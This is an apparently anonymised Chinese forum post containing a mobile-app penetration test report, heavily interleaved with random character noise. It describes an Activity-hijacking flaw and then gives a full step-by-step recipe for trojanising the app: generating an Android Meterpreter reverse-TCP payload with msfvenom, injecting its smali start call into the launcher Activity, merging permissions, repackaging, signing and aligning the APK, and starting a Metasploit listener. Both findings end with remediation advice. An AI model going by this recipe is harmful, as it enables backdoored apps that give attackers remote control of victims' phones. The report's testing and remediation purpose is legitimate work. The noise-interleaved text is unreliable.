" O3 m; H w6 p! b8 a! ~ $ N6 X' B8 f9 H! s9 @9 H/ X1 ?   , H3 F) D* ^' x* X+ }0 W7 F ! ^) |% D: s2 J" t- _+ I7 p

% n; U" q: f/ Z8 m0 r" Z9 S! l/ b$ z

. f; S% K8 q, n P% D p ' ?8 v7 q9 u5 M$ X" R( e! \ 1-2 测试结果 4 b# o% N8 d$ e# D& w8 H: Z# b' ^: ^2 @8 f

$ ? }1 q1 M) n- \0 A' a, ]. j# {' X 4 H, p& v9 `3 a; k I2 I& k

; O- N$ H! f) l" _$ ~4 m $ N; c& N% B: d: I$ H/ Q   + r y) A* j3 r8 O. n+ L, G q% a r- U: [+ H3 @' |

0 A- {; b) D: m6 n* r+ k - Y% e5 P6 V4 _$ U0 D! Y

# c' R# x: h; {. F, n! y2 O ! b/ i2 X" i, {5 g# |& p" t 2 检测结果                    9 K2 A" a% o( K6 F , X$ s0 K! I4 t# ]8 |

/ X3 n- z8 i* f! {% b, D* k1 y1 j* o8 h' e m

% N- Q2 D+ Q: a0 D F H; I# p2 Y9 z" R' p7 q 2.1 某某某 5 z j/ q- ^& O; c1 k ' n" v+ {" }0 Z

( R1 Z% n$ ?8 D4 `0 s, y5 A# A. I/ S: e6 ]! z# I; @

+ W: ^& p" Q, J, z; F- n x/ S) G& d! v 2.1.1检测目标 $ M7 a3 M; @/ a. v. K/ k* K1 D! A z' d% U$ T' P6 p

: Y1 N( b" D9 \. x9 t ) Q* _& v% p& ^3 v7 X; F9 J# |

8 a3 Q2 u7 N& J& H* Z" u 2 B) \' l1 u5 i# N# e; }0 ` 目标地址: 某某某某某某APP 9 ^$ r5 l& h& S B Z2 a4 v$ Y5 V. I- {2 h. f3 ]

O- z- M) s0 U ?4 l9 E $ K6 m0 F V6 `& N

8 @3 j/ i7 ~. J1 V) M) A" d - S; W7 o- P' \( _7 E3 Z 2.1.2检测结果 1 Y& A+ e9 A, l% H- g' N 8 `7 } p Z; P% E; |9 F, H

' j* W* a8 v( a% { 2 A' q' n, N* r, ~6 i- I

1 f) i* j: ?; G* A9 D/ v6 n$ D0 m 2 V/ ^" i8 w! W0 f/ L* X 2.1.2.1 ; u( c( @7 S2 ~: C I4 I% v. B1 k# Q0 q6 r/ U9 I; o+ I

& L% t# h( x+ ]6 x4 Q7 _9 t% n( p: z3 \5 f

& t- u; {( h. W1 `7 F4 T, K 5 w+ ]7 {! Y7 t6 s7 | 漏洞链接地址:某某某某某某APP ! G. G3 p1 L" B- z1 E ] 5 O% g. h' U8 r# O, g

: T7 S% B! g0 U1 ]% J - i" u* h4 ]( M% L$ Q8 \& l9 [' C

3 J; a2 L+ k/ W ' F0 G$ N1 ^6 g9 i7 y4 r0 j   $ V3 J7 N' _, c$ t' | 6 _- }2 @/ D# K

8 U! L! w& m1 `' z8 u* y; X' B" e/ F7 w2 Q# I& v- X2 t' X8 l- q" H

' s3 U# Z& A& ^- `* Y5 |" U2 X 5 q# H! G% u2 v T z 漏洞分析及取证: . K8 C4 Q& v$ t: x, D$ G9 k 3 O* R; {" W/ M3 Y0 o& o, a( w7 S

* W9 e5 Y1 u( w0 z7 n3 W Z; h: s; d6 H2 L, m3 Y

- W/ H* W( n2 {+ L# |; O5 {+ {" I4 F: L; l" S                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ H( F' U% z5 O0 I7 d+ v4 R k# q7 C: C' S) ]0 a9 i- t8 N

3 B8 y H! a. h! M+ @" U2 {$ f6 T/ v* C1 P( y0 h$ x% k1 v! c4 i

* O0 U- H/ r' J4 u o) C6 q % _3 a6 S* d$ A+ o      $ _. E7 V N/ i, h/ ?) ~ d2 m: Y3 A! V K L1 v6 t5 Q

- H2 U& }2 U: s5 k# w \. P6 Y% @+ s7 l& j

' d, Z, y, H( O! ^* O: ^! a 0 w8 t6 G$ P$ R7 ~# x6 p5 n                       - w- A/ T+ G/ y, K ) K$ @& k0 F$ e* e0 }

* C, o( @( x" q* g/ V; d1 ? 7 l$ y# Q. {& {% q, p, N0 x

9 y6 q) H# X1 _; l4 i : h4 [% J( H/ ~3 H" R; H3 C 1 D* o5 d, K% _$ E: L$ l3 { 2 `5 Y S* ^% u

w+ s, \7 v. [- [, \0 V 7 x& R% x- U, p( d- {* p8 X

3 }5 A; r2 o& j8 t& X0 N0 A2 {4 ? 6 L7 m2 \% [ G, a( \( x F/ X* b; Y/ P9 F1 B- t- q

Z! o: F6 g0 a0 |, m . ?- u7 Q. ?0 S. w4 L Q

# S9 j6 Q& U% K9 n7 q# |1 W4 l + x: ^' d2 Q0 t) m- ]% p ! ~' g: ^+ e1 E5 }4 L3 c) m' M 1 L+ P$ e0 r" ]6 S

% j& S8 p" a/ r# Z8 U" b: p: s6 Y9 B& K7 r# u: U) H/ J( M

$ ^% i, l6 {! L( p5 S" v0 e& |. D$ u5 z" W) ~5 v 漏洞危害:高 # G% z8 ?2 R/ T7 Q 0 q% k4 ]2 e3 j: q7 S7 T

. x9 }. ]+ w8 h B/ o4 Q# y+ k/ G4 R* v& ^0 t5 d9 v8 x# N
1 o/ z$ e/ A& Y1 [2 Y 9 ~: _1 {3 z% W! V5 M 4 Z0 k/ {% V! X/ i9 j2 }% U9 o0 s: k& V; e' N" k* }9 }! J& E4 }0 ?* A( r0 I. R4 h3 Z* p, ^3 ?# Y) ~" \5 r: G. x% J. C: a2 J; P6 S3 i% P; X6 Y" z, j7 B. n% ?- ~( f; |7 [7 x; A$ U8 O. F$ z, z P1 j, }/ I* [) |% D( p! W# O# Q6 I+ k0 P( ^8 Y$ ~0 G' ?2 R& u0 L, U4 {- v. D" S; z# o9 Z$ b, b# c" ]! [/ O% }+ k% K) W" K6 @/ Y! B5 ]6 l( Z1 J# X6 o8 e7 K0 z6 s6 X6 R- j* F' A7 X4 x5 o8 c; r: E( m8 s5 W5 u0 K& E, X/ d, ]9 ] j) ^+ Q0 ?6 v% `9 A3 e) W5 w t, E/ y. Y' T0 F0 Z9 J- g/ m9 T9 [% C3 Y& U# D0 F& W. x2 N, x- L8 ~' I# J% [6 G2 h3 w3 e* ?" [& n+ k/ ?5 u3 h! C0 T/ D; j7 z+ }3 O' ?3 S) X, O& Y
7 t3 |9 `9 S \$ I( _1 R 6 h/ K( r: C. V# S* q$ l' X9 `

9 Y' x; \! h8 u8 x8 h# o , @7 n7 q1 U' ]2 w# O$ w 严重程度 ( K* J5 c* F0 t8 d4 Y1 `; o/ O - @* ? Q. u) E( ~4 v" B! d" i% x

9 _' a3 D1 H% g! R7 K1 |. D6 W+ g& K2 S# M* t1 C 		8 a( L' ?' ] d( Y' j, F8 Y9 s4 g: c% n" K5 I

' I: G, a# |# B& r 2 M- E6 }1 b2 a* {3 I, p 4 I* P. x1 y& _) w z& ~- L! F , H. N6 p- \2 V+ X4 [# O& _ R6 Y

4 \/ ~6 f& z v+ @* @8 d1 a . M3 Q- Y" [3 a 		+ Y3 w8 g% A/ H @# y5 n6 y' u9 e( x; Y

& S2 l) c$ |! `4 X 7 {0 z% h. e+ C2 T9 h" ^: _7 `) Q # i$ a) |/ c8 A: s; c; h$ L8 N9 Y1 Z0 k' u

) F; U$ K- w7 a: j$ u 0 T& E' \4 [) \/ n2 a. _" L C 		2 J" M; D: l/ V. n 1 S' I: K: D0 N1 [2 J, R R# C

6 M: [8 ?/ G4 @ f. |8 ^ , K: R7 W5 }3 K; e" p/ j 2 d8 n, i: ~0 Z; L v 3 H. F! s! I: {# ^# L- ?

( a) Z7 q& } h1 d( l0 |7 w / F& ]7 n+ I- o" q8 S& Q 		6 H" H! P# f( s* d) @$ C + n' E" A" c {& m( f

, W7 c9 ~, G' Y( j H& n( a % K; u/ Y. v4 w* N& {   : m* L: K4 G% |$ K( y/ n6 \ - T4 i: i5 }% K# o9 H1 \

! a; X& b! k# m9 j: z; S* H! c2 A" p& ?8 j* i# } 		& _9 s! @0 \( q8 b9 u) Z 1 D6 T8 O9 [2 S7 ]( ^0 q

8 t& u' H/ {: z9 N; h- ` - H+ N6 c- `3 p+ M' U9 r ; h- N3 F/ X0 H ; s+ ]+ b" _ o

- Q( e, D9 q" _/ {: o3 S U1 N. @& I2 z k' L! f 		( W6 V! {- ?( y$ r2 G; E* { 0 y0 `2 [, V6 q( U& a$ a' p

+ {0 y# M- `) o/ o- \ - t' `4 q: X. i6 o" f+ n. H3 Z   / I) n. ~4 U' f% r+ e4 F5 e : u. P/ E$ Z$ [- X3 ?

" H/ g, X( r: } 5 X7 P' ~5 D& l9 v/ t; z5 Y/ B, K
: F) N$ \ a i3 X & V8 w+ e; A" b
2 P+ Y1 D3 j- O$ M; }- s3 a3 C # X6 ~2 m3 N. c: t* I

3 b+ f# Z( k/ k) P" V$ m, A- Q 2 J S7 U. b0 Q5 j, }4 p   3 n2 M" ^4 X3 A4 c' n# p+ ` $ ^( L# u$ q- q3 h

) d! q7 a/ b3 q2 E3 q( p7 v: _; d- T) \* r& Z* I% D

- i" C- ~$ A6 j a , a3 v! h: \' ?& O6 T( e- L! v 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 / e) J; w# _8 j, h# t, z ( g2 R' f' G3 m2 J% R4 @1 e- o

x% Q4 {4 j$ V% R / {' N! b( Y" g' s+ D7 s

7 F2 {5 h0 g, @3 \9 ~ 0 ~" _, R9 ]9 d           + l3 m8 n# _% L! C4 N) l) {9 P) _0 v$ x X" l/ Q. X( @

: `0 C( O) S/ [ ' i/ l; S9 W) C1 T: w r' Z: U

& W0 a9 k s- F" d) G" W8 H- @ ) f, m) K" O7 a3 x4 F! n8 {5 ?4 ~   9 D" g% A% i, n. K' O/ Z9 {7 j, | " U) ]$ d% N' \9 [; F

! k0 N/ p( {5 P/ K( {( ` $ B1 F( n) J8 L

: ?: s9 ?; K, C4 o 9 }" F3 {2 q y/ k, f% q2 X) R 2.1.2.2 9 p5 ?4 ~2 f9 {* M* {5 R& K' ^2 I# I+ ]

+ k6 g" n i* F/ }% V/ ^. k7 x

6 |$ v3 ^2 p: _$ `$ [) u$ {# i { % l I& c* b; } 漏洞链接地址:某某某某某某APP ; E5 z `# D% P 1 g' O* P4 j" X; e6 |9 t

8 v( o# A: [ h9 g' f4 r( E ) B) _- D& |5 Z

; X% e+ L+ X! b$ g# ~9 l0 e + Q, f: Y! x* x0 Q/ F 漏洞分析及取证: & Z7 u% S% F4 j' h & f3 Y2 R! o7 ?( S/ j) H

. D" z4 O! T: a" X9 X* b D; Q9 Q/ d# Y: j9 [9 L3 W- b

2 M, S5 d2 b2 l5 b% y! o 8 M$ p, F9 T; F' `                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 Y! ^, g3 h- X- o3 } } 8 W' H: A; D# h& O

4 [) J! Y: ]: b: A - b, E% {$ q1 r6 R9 D, D

* J* l9 O. Q& h/ c" B. R! e5 z( h9 O* C' ?; V/ Z Metasploit 生成木马 apk 3 e2 m7 }/ y# @- R + Q- A: s' d" `9 y4 e

. U6 Y F; t. I) s/ `# `7 V& H( i3 r4 \% Q5 D+ X% H

1 l& E# n+ a- `; e0 Y& }% |3 z. J1 r" n' P7 x# f1 L msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 7 ^9 \* w0 p3 P4 \+ _. s . ~- A7 m. d: L9 p+ T% f

5 X! P0 a& P W: X# U* N9 X h( q3 a$ X* y/ o$ u+ F+ x& H6 k

- }" T2 q& f: e% t7 S7 W " p( z( S0 j: B; J& F 反编译目标apk和木马apk 9 z6 g. O5 U% y3 c, U z8 m8 G 7 ~9 w' \' t& Z) k

. g: {" `1 |0 {, W5 P , r8 X+ f/ L' [9 ~* Q l

: ]3 [* ?8 r: ~8 U4 t7 {& t t! L8 p h7 e( t0 D apktool d target.apk
+ V" _" I5 p: Z' \' L3 [: R7 V4 @, w/ ?$ B7 l' ~, E6 N apktool d cockhorse.apk ; Y h D4 D: Z- m( J6 Z0 v% e6 z/ g$ T* I& G6 I/ J( A a

- B+ I7 Z% e3 h9 M6 M9 \4 ^" C3 G2 F5 Y/ I0 K' R

7 B4 D6 f5 R& w9 k" _# {( j0 b( V5 Y1 n; X+ u" Y 木马 apk 注入目标 apk 6 P2 K) Y4 K" L% v" X: U; @ 2 K* U, E8 I7 J3 v

7 h& m+ m: Z2 l% h9 u ( \5 }7 f6 V" e4 R

$ P( V- ?: r& \/ f4 c' W4 L ( I% X" V7 C& Z& K! [. w* I7 `4 } 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
- _4 \* z& r* z- E; y- y3 m! @ $ N( k# e1 [/ n; W9 H" Y# i invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % c( x: j9 L( K* f& E 7 D. G2 O- m* A0 n7 ~+ e

0 k2 H' E! J f/ R/ ]! H, R 5 {* q' N# U" ]5 E$ @

( ?4 ~$ x' _" O' Q; ^% {" `0 G / Y; s4 L' R( r% ^" K* d 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 |# M( h# k+ _' H. t* m" t" e % t" |5 S; s, x8 \3 k& ?( ?& D# _

5 N6 [2 }0 C' n- l % G! J5 w! K/ p6 G

# f4 i# f5 I7 C9 s 5 s) c& ^2 j3 K A 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ / i% r2 P K6 \ # E" C5 b. d( l8 }6 G

g- i; w; H( P) T0 N; p+ t/ N- ~( i6 R; f! c4 ~

4 b# ~! |6 X0 s5 e " ?* y. M0 L2 K4 l5 C: W 回编译生成最终 apk & K. W0 B; f- e# G% X 6 e0 v8 f& l) b9 ?- a& t

( |5 x( Z8 E& s! T/ | * E3 h5 J# \) G- N

7 k2 ?. T8 @5 W# _' p ' Y9 {, A9 {% c4 s* Y* r7 p$ W 重新打包 5 {, N# ~2 y. x- [9 n E4 s! ]1 c8 ?7 M8 i$ @

; T: E9 n6 [0 T) q0 n8 a# y. b' H1 b * s8 D% {% ^/ r+ i7 b" X. \/ ^

! q& @$ d* ~! r. e+ h4 |$ p1 ^0 K! t 2 x( m9 e& v2 c0 a apktool b -o repackage.apk target_app_floder ' y! j- P: Y1 ^5 \" z* ` , ]! ^4 j |7 e

4 J) l, P& G* b( f1 P1 e( t) I 0 N4 e2 M8 u$ F( N2 a* C

8 B# |& @2 v9 z" Y3 ?# [4 } . Z$ `7 E2 O8 A9 k' B 创建签名文件,有的话可忽略此步骤 9 ^% O) _4 J+ s _, ^* l# C3 l' K3 {+ P* b

1 n! R3 d2 H* c* B* r * d1 b& u' U$ p3 B' u; l

0 O% w% B1 u: u* K ' X, R' t* O* p keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                / s- d% }: Z O5 M5 e+ E 3 @: E% ?4 c% y" Y/ d

" P' R& v* T6 k6 }0 S 9 ~: J. R3 ~; p0 ^

" J: [# Q: R4 N( n- A" t' M* _: r6 _$ V2 \ 签名,以下任选其一 5 {3 s" r6 u$ r0 p: k$ [! \ % F7 p0 v& @5 l3 @, e6 M

3 M7 O$ j- N0 P# j% R2 m: Y7 S8 s , r, }+ X# n9 I% X, I4 f7 Z& ^+ r

7 C; v8 I6 Q9 m" |5 [) `6 ?- h E: Z/ v3 b. Q& \& W, L q jarsigner 方式 7 F" L0 t% ]( ?& l. H. _ . j2 H8 ~: ?5 Z5 r3 P

6 {7 f: F- x( g5 c/ ~8 L/ P + z0 ]/ s. e! z3 F1 G2 }

% W1 `( g/ I/ a* q- K; b& @% f 4 h% \* ~5 o4 i. y- j3 ?- P" H; X jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 9 F; K2 ~' N) [+ v6 i7 f9 @2 J " b* s6 e% @" D) g& P& V

3 @9 [0 @2 L: h, k' X : n* J, i" s1 u) Q

1 s" F8 x' m" { [ ) k% N- ^7 E! _0 J" d apksigner 方式 ^! M3 J& o& P+ T! A) u% u' [! u2 r% q ! A X; R( _3 |( h( [+ L

& z. J8 j0 t1 `% S: i) O ! l' m/ Z! O: {' \2 \9 Y/ b2 l

! e4 Q0 e1 q2 ~# i( O 5 J7 M9 m1 v& F. @; P$ K1 R1 I L apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 D1 r, x- P3 {5 d" ? * Z+ X% Q8 Q! a$ j6 ?3 {

8 s: k& J+ [5 M* B- q" n3 n" u & Q9 E$ o: c# y- l2 g7 x4 v: B2 k

2 k& i; y& R- }7 I / x# N7 t: j2 h, T c, n 如需要禁用 v2签名 添加选项--v2-signing-enabled false - F! J6 R7 e7 C | 2 S6 j( i9 V* _) G

+ x( ~6 O3 _' F: j+ N5 l d; e( B, h) F$ Y5 U P

" m/ w: S& [, r$ A4 n ( N# Z, X7 u& v" k: g 验证,以下任选其一 $ m- \. D5 g( g # L L: i; z2 Q

; S' B0 e! B5 s7 f * u) L8 z% v* `8 F6 b3 @. y

9 [; |8 u5 n1 t3 ~0 ^ + N* O$ d/ ~7 x5 p jarsigner方式 1 D2 i Z3 _: v+ B7 y. c3 |0 T9 M+ V& O 4 V1 x" R# l) U

5 W% C& }/ ~! G6 v& q+ P8 z7 m% C3 R" U" o. O* n, {( b) ^

7 t0 g) ^" w1 N ) q8 h' ?& O! M- ]6 W jarsigner -verify repackaged.apk % ?- V7 m: L. k! a. R O8 E9 V4 a6 q$ S1 j

2 Q7 E9 v# Z0 l+ |9 V & b7 Z) G8 i2 ~/ A( D" c

q K4 o v( j$ H8 E9 M* G. ]+ ? apksigner 方式 ; S; d, b( h4 c% R/ t8 `- p 3 G7 ]$ a0 \& _, i- S3 k

+ I. A: @7 i7 N; l7 r 1 D0 L* _2 ~$ h, |$ C" G

5 ^& P/ L! g0 h9 } $ Y; l1 x& c* A! k: v apksigner verify -v --print-certs repackaged.apk , n& Q; a3 n/ c/ i! D& {, I2 U! _, k2 t

2 @. P7 ?6 X% x$ n% U* C: S7 T 7 a! a c7 |# f! P/ r3 s

$ m) I7 p% H& ?# n8 Z, l, z0 K6 {# C) Y0 j$ Z4 v2 M keytool方式 g2 U/ ^, J( J ) G9 A, m, A/ }/ e8 |& H& m

0 k" t; |/ j/ _8 J6 R% P* D 9 Q* z& K8 b1 N7 O; v& P6 S" V

1 M& @% X; x# `8 j7 Q2 J + F- N9 B& G0 ?. r% j keytool -printcert -jarfile repackaged.apk ! U5 j, N; l! l" k9 Q& y- x! D A) ?3 v. d& A% p8 V. g: h/ f# b

" E! v. j* J. Y5 p 9 N* Z. Z! H5 ^1 o w. ?2 k

: k6 ^4 _& c5 P9 V: q$ @ , e1 j9 b: N; u1 c6 [# u 对齐 2 c9 e# R) A! n# B4 W0 \ 3 I" q" t7 P0 ` Y8 p1 A; A% h. X6 j

3 X/ H$ t3 M! t0 c8 \ . C& u5 E: Q) B: {4 ^, G

: J, D0 {* {& x/ b9 e! K ! O9 X# E7 D' S" | 字节对齐优化 . O, g* r5 S6 E8 f$ C4 N( X: n; a2 o. j/ N+ i8 y

, h6 b, H1 t& K0 ?0 o& V3 K W7 b& u9 V& S/ Z7 r3 o! u X2 e4 j

8 `' t1 S2 F& R/ Q4 _ : X. y" W" g; d$ ?& C: ~: D# Z zipalign -v 4 repackaged.apk final.apk ' u- d7 G' e+ O8 c5 U, A" K d! G* n

' `7 E: ^1 ~$ D z9 G6 Y 8 E7 r1 H, Z+ d& [9 L" m; ^

# c3 ~! q& P1 f/ t5 b/ S - b& }# L8 r/ A8 _' J; X4 a* j 检查是否对齐 & E. B1 M) [7 r! i' y# y, ]5 p8 P4 D

1 x) |+ v$ N6 T4 g) m- d% P' a$ a - _# {8 ]2 B# S

- Q; k) N2 W4 f2 {& H: K0 P6 j' g 7 @$ s1 v, u6 b$ s zipalign -c -v 4 final.apk 9 r1 E2 q5 Q' `& l4 E% L - h7 F/ g! `0 i0 A2 _

8 t' C: D* X' D3 e $ q0 H9 z$ C0 _" U: M @% d7 S, q4 c

, m0 A. n' c! @ u' A6 I & K) v- \1 O# o$ @& H3 ?/ p 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 2 J0 X, ]3 U7 C! M; U , N4 A$ G3 a5 v# p. y

% J( S0 n7 y& ^/ i" M0 l7 C0 s - w2 p, `1 n& I5 [

# [2 x6 M4 F/ z8 r3 t% z$ M* I$ i1 ^, r 启动Metasploit控制台,配置参数等待上线 ) x3 m% c) ~$ R% L$ ^- @1 A9 [# |* f$ S7 B+ Y4 H

- o" ~+ S' s+ G- Q* y8 u / ]. o; }3 G- t" _7 \

( {, r; b9 I( x1 p # r4 ~1 Y+ z, S 在终端依次输入如下命令 / {( P. m f4 S9 m $ ]9 r. U' L2 U& O) ?0 R. r2 l

3 l6 a6 l$ ~5 t& O 2 y1 u$ b4 H+ C" z" `+ j6 G

% M) z+ `3 A8 } s & L3 q2 i: t2 E1 f$ a msfconsole $ s5 z4 D, h9 B% B1 _. _5 Y, W 9 ?& U6 u/ u+ b

3 D, S, L0 D! Z7 A, u# H) I V M+ H9 i0 w+ P

5 H4 u. K4 B& i* g' b4 M, r' B5 P% u9 l5 A/ j4 ^ use exploit/multi/handler 1 G! J! o$ C9 ]8 }+ B. l3 p5 M1 @) G9 c0 m' @( C. L1 N n( e

, L L+ x% v! N/ l8 [7 _ 1 K, L' S; ~3 d

$ O: X+ v8 L9 N9 R9 m" D 0 ^$ w9 P( [- y' A set PAYLOAD android/meterpreter/reverse_tcp % f% Y0 e' m' d8 n7 _, W! Y& G . H1 |$ Q" Z0 `6 G. l% O

E( f% S6 J* q7 L, S0 @" @: D2 `6 q B1 P( ?

6 {6 Q+ C/ f" d J: L, A3 o7 Z, k ; w6 E% J+ ]& m$ m5 c+ v6 T$ ^ set LHOST 192.xxx.xx.xx ; g+ D( X, _7 `" N6 A, u 8 U; q; w9 l1 F6 R# y

; a# g9 D) a6 q2 X! f! n% g$ Z) U8 G0 x- F9 D

" m# Q( @ D' a: q6 I0 J ) L J7 }4 B( V9 q' |0 q% W set LPORT 4444 & |; C! O/ p6 k$ \4 n 9 ?$ N4 S# W; H! \+ I, s G

# G* w: H: J, F4 n( W$ \1 C 8 @- D1 U+ r4 Y

- Q) `( y( q1 P7 n' |/ B+ b! P0 H# n% a( t; F exploit ! u n* B+ F1 Y( n8 x% E p# [( r% S2 K5 I

' d/ K1 o$ L$ |5 u $ z5 y7 f0 ~5 [$ n

+ S4 D0 N0 u% {5 K/ V: c+ h2 b. G0 f! [; x: [! O: g" t1 K 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ' P B3 F0 `6 K5 D$ W 1 m n: |) l; [, o

+ J2 ], Y3 o( a$ `/ x + }0 ~( k- P0 S! w7 Z4 M

( ]5 m8 _# d- t6 z4 {# N! j- `+ n' m( I 漏洞危害:中 9 ?* W; x8 q- ]% N7 J . \- ]: x/ Z( I: h3 r

( Q3 `9 P+ k9 \+ c 7 b6 H% z/ v! s, W
1 s" d4 `6 H5 T8 P * o4 c$ {5 _* S0 d 1 n0 ^1 g3 c# F, r8 \. K" R) Z* |1 U x7 `; O6 O7 w0 A$ }8 s 3 J8 l" v) E. z; Y G0 v& x3 `3 b+ |7 f1 N: k6 m" {9 w: c, ~, @5 \# P7 q' [6 s# S' T* N m6 `* c1 u; R$ W* U6 S. n& X$ _/ ?3 g6 m! E3 m0 I! b; f8 J; @3 Q1 S; x$ u7 P" B! V8 }# Q5 l$ K5 g3 r- k6 J* i3 H% w0 ?- _3 B" X f6 m3 G6 U8 e3 G6 F) X8 f1 @5 x) Q% T0 q: m" J) {0 H& L' v6 ^1 K0 X" K; k# a) K) P( q: w. t4 T; F, u2 v: J' b, G j( S7 n! |3 V/ F P8 Y& [2 s$ U* f! w' P- Z* r7 T& Y; S" n& ~. R/ b4 h8 H* n, w5 J5 y/ f5 n7 t+ I }0 n h) f+ _* ?! K! H% `) z x1 E' f; P: _( z) q& R# a1 n D$ [& s9 e$ c" |# c' [! \0 A: V3 j1 [/ N! p( {! W6 i* |) o7 ^$ L' \1 X: g
8 v1 [/ ~- t3 D) y( e! y; ]8 F

. y. g9 a" r7 F1 p" I7 G+ k/ M + M5 G: b3 ?% [. M 严重程度 7 e7 z9 x% L: z" z4 D , @ ~- u# Q2 K/ i

! I. @ N) g o/ c 7 i, U6 u: }- o2 y2 l& U 		0 y; q2 z& W& O- H/ J* v+ O$ U$ g# N+ \& e; t

: f3 G4 C* U# h+ ~ 4 V+ Q7 ]3 A; `" [0 b; h2 `5 G n( e3 \. k 2 a }5 ]5 [" n3 G2 G) K * t! h* B) G/ X+ b9 Z

! w) `1 L% `: }) T& e! D) j5 `/ X9 G& W 		) D6 f1 u4 o- K1 Q1 D& d; W3 d9 k5 F }; f) M* i4 ~

8 t% j; T: q+ D% b : S0 c9 Q$ }, Q $ `, t5 M1 `* V Y" }2 F% R- ?& a

0 h X) G6 W% H8 m- N, E, m + {8 c7 x) n# `1 H& Y, z 		0 L3 y+ A# j4 N) N0 n 3 x, a f6 S2 X! f E

2 O% W' t ?1 w! ^ q ' M2 }8 z# m% @% l - k J, Y" o# p S4 y 2 J5 o( E! m% L/ Z1 D

6 Z9 C: `* @) a$ M 5 K% G& A: i+ H: y/ d9 o 		7 {# l4 H7 l, G5 W: x% L " E. K0 V: t9 `" D8 ~( r. Z- g 3 |; [) r# F. n. q) O ' b8 {# X# J, ~1 L

# c; F! G# ~4 M8 r; I. z% }) l6 O* [+ v6 p7 w   9 e0 u. ^& A' `% P 0 V c% w6 j% k2 @& S

/ `2 P' k# a# J 1 d8 D; Y n5 Y/ G% ~8 ]! p 		" ^0 u- x Y! s+ `. R8 @ / p" G. r9 x( a( S' X! K

5 |0 x. [/ i( N& F3 Z5 x p# {& ^1 ^7 Y1 T/ F+ c2 d 1 V* ]& B' \1 H: {. ] & z' ~! v% p+ d+ ]

9 {3 P8 Q1 r! \4 G 7 a# A. E4 }7 [% { 		5 m9 h- Y9 j6 _; T, [ S3 h; M+ W2 w3 b. h : L+ R9 s# `6 l . ~7 `- ]& M; P5 E7 \5 L! M2 m" V

! v, A6 j8 N1 h. O& S W7 h0 h $ z7 {4 {9 }' D+ O p/ O( {- @   : N( m3 o4 D/ X: s, F 2 W6 t- I/ X& g

& k. E( u' d+ u1 r2 x7 {$ E& S9 O ( i( P0 g% t- {3 ]
- U$ `9 \; m6 d7 v 7 R5 x! W* ?2 Z$ j
m5 ? s+ t; \0 T$ `+ C" F3 m 0 w1 ~8 I( w) y5 P" T: j A

1 O: d5 C5 F. D% J " `) X: K3 g) j3 g) R5 I   $ f* p S# I3 F$ r% G% H ; {# h8 f* M$ D u' h

H( A2 ~& Q; `; Z" A u* E3 v7 `( B5 b$ @1 Q P# c6 W

0 Y( Q4 P; i) S( r/ S ( a9 a8 h! H+ o: F; h0 K; w6 b2 Y 修复方法: ) _$ k% i! c: O0 k3 h0 B" [9 h$ \0 }$ t

" R4 H- u1 ]+ t0 u/ } 2 r8 c0 Z2 B$ ~$ s! E

; L6 G7 O; Y2 h( u" h. J* n% f9 i9 N" [5 P: |               1. APP 启动时应做签名校验防止二次打包。
q. Z2 R) j$ ?( h" Z0 d . _0 \' s! a8 l+ f 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * O" O. |7 Z) }7 Z0 P - N7 @8 }( p$ x7 n7 w( U3 p) ?

# I5 a% B0 b- _! ]8 @ ! {8 m0 I9 v; _1 A }- i 2 e0 m/ f0 z- v# s8 r' h0 G) X$ n4 R6 z& U" y, e

s3 B% r# o+ b, G& Z3 T 6 J5 ?6 t0 ~, @   7 H; e7 H/ W' X, O( q + Y* F7 c2 ]) \! R2 k/ g3 T

2 Q" ~7 y0 R8 x5 i' N, V" I 2 M, M$ F! j% Z0 O ~' E# X/ z & D# e3 g' C2 j' X: p3 r% C. n8 ?4 [7 E

, J. `0 a/ W2 j. c1 w, k3 v/ d . ?. ~, a8 M n+ y
% E7 r5 g' C! W" c4 n* H & P: Y1 ?7 P8 K9 W4 @, L, v

% _8 P& M! d- X' V3 f t+ h' | 7 B/ _' i t' H w! ]+ i
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表